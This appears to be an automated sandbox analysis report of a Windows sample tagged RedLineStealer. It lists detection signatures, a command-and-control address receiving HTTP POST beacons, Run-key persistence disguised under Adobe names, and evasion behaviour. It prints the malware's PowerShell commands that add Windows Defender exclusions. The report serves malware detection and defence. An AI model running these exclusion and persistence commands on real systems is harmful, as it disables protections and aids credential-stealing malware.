Windows Analysis Report 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Overview

General Information

Sample Name:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Analysis ID:	553368
MD5:	8fb77edbae0c40e1e19d82a406b7615a
SHA1:	0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
Tags:	exeRedLineStealer
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Sigma detected: Copying Sensitive Files with Credential Data

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Sigma detected: Suspicious Script Execution From Temp Folder

Uses netsh to modify the Windows network and firewall settings

Uses cmd line tools excessively to alter registry or file data

Modifies the hosts file

Uses known network protocols on non-standard ports

Sigma detected: CobaltStrike Process Patterns

Sigma detected: Powershell Defender Exclusion

Uses whoami command line tool to query computer and username

Uses ipconfig to lookup or modify the Windows network settings

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Modifies the windows firewall

Sigma detected: Whoami Execution Anomaly

Creates files inside the driver directory

Queries the volume information (name, serial number etc) of a device

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Uses reg.exe to modify the Windows registry

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Netsh Port or Application Allowed

Queries disk information (often used to detect virtual machines)

Sigma detected: Whoami Execution

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Virustotal: Detection: 20%			Perma Link
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	ReversingLabs: Detection: 39%

Antivirus detection for URL or domain

Source: http://185.112.83.96:20000/callback	Avira URL Cloud: Label: malware
Source: http://185.112.83.96:20000/callbackmheap.freeSpanLocked	Avira URL Cloud: Label: malware

Networking:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 20000
Source: unknown	Network traffic detected: HTTP traffic on port 20000 -> 49751

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49750 -> 185.112.83.96:60601

Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96

Source: acrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp

String found in binary or memory: http://185.112.83.96:20000/callbackmheap.freeSpanLocked

Source: unknown

HTTP traffic detected: POST /callback HTTP/1.1Host: 185.112.83.96:20000User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipData Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56 Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Source: conhost.exe	Process created: 43
Source: cmd.exe	Process created: 44

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:720:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\acrotray.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	File opened: C:\Windows\acrotray.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes \| delete \| synchronize
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes \| delete \| synchronize

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720	Thread sleep count: 6104 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720	Thread sleep count: 2838 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 1369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 6848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep count: 5602 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep count: 2735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep count: 5180 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep count: 3331 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920	Thread sleep count: 5450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep count: 3003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060	Thread sleep count: 4727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060	Thread sleep count: 3458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 720	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6104	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2838	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5602
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3458

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
